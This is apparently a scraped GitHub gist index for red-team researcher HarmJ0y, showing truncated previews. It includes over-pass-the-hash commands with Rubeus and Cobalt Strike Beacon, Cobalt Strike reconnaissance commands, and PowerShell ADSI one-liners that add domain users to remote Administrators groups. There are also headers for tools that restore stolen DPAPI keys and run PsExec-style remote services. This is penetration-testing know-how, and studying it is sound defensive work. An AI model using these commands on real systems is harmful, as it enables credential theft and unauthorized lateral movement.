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Coding towards chaotic good while living on the decision boundary

Will HarmJ0y

Coding towards chaotic good while living on the decision boundary
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HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active July 15, 2023 14:43
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / git.txt
Created May 31, 2016 00:46
Common git commands
Show remote branches:
git branch -v -a
To check out the remote branch:
git fetch
git checkout <branch>
HarmJ0y / Restore-UserDPAPI.ps1
Last active July 7, 2023 09:05
Restore a user's stolen DPAPI master key folder and optional KeePass DPAPI data blob.
function Restore-UserDPAPI {
Restores a user account's DPAPI master key on a new system.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / gist:fd98c4f16575ba28c091
Last active April 27, 2023 13:56
Powershell ADSI tricks
# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')
# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($[0]}"
# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"
# Enable the local Administrator account on a remote server
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active January 30, 2023 11:54
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / powershell_talks.txt
Created February 14, 2017 13:20
PowerShell talks
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / Invoke-Psexec.ps1
Last active September 12, 2022 02:41
function Invoke-PsExec {
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the
HarmJ0y /
Created September 15, 2015 07:51
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):
HarmJ0y / Invoke-HostFile.ps1
Last active September 12, 2022 01:55
Host a single binary file without needing administrative privileges
Function Invoke-HostFile {
Hosts a base64 string representation of a binary file or a given
$FilePath on the specified $Port. Any HTTP request to the given
host/port will return the binary data of the specified file.